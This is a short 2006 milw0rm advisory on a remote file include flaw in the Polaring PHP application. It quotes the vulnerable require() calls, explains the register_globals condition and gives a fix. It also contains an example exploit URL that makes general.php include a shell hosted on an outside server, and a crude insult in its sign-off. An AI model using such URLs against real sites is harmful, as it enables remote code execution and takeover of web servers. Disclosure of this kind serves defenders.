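###### ToXiC #########################
#
#Polaring Remote File Include
#
#BuG FounD by Drago84
#
#Application Affected: Polaring Remote File Include
#Source Code:
#http://sourceforge.net/project/showfiles.php?group_id=150989&package_id=166837&release_id=444225
#Problem:
#require($_SESSION['dirMain'].'/view/css.php');
#require($_SESSION['dirMain'].'/view/frontpage.php');
#require($_SESSION['dirMain'].'/view/navigation.php');
#require($_SESSION['dirMain'].'/view/gmaps.php');
#require($_SESSION['dirMain'].'/view/errorReport.php');
# Each include path is prefixed with $_SESSION['dirMain'], which general.php does not set itself.
# When the page is requested directly, that value can come from the request instead of the
# application, as the example below shows. This presumably depends on PHP settings that let
# request parameters populate globals (register_globals) and permit URL includes (allow_url_fopen).
#Solution : Declare $_SESSION['dirMain']
# That is, set it inside the application from a fixed server-side path before these require
# calls run, so a request parameter can never supply it. Denying direct web access to the
# /view/ directory removes the entry point as well.
#Page Vulnerable : general.php
#Dir : /view/
# Example of exploit:
#http://www.site.com/polaring_dir/view/general.php?_SESSION['dirMain']=http://marcusbestlamer.gay/shell.php?
#GrEatZ All Member of ToXiC, Str0ke
# Fuck Sonic Il chan italiano + merdoso che esista
# ToXic Security Italian CreW
###### ToXiC ###################

# milw0rm.com [2006-09-25]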